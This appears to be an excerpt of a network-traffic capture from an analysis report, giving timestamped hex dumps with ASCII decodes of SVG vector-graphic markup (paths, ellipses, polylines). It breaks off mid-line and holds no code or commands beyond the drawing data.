                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13500INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                                          Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13516INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13532INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                                          Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13548INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                                          Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13564INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                                          Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13580INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13596INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13612INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                                          Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14188INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14204INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14220INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14236INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14252INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                                          Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14268INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14284INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14300INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14967INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14983INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 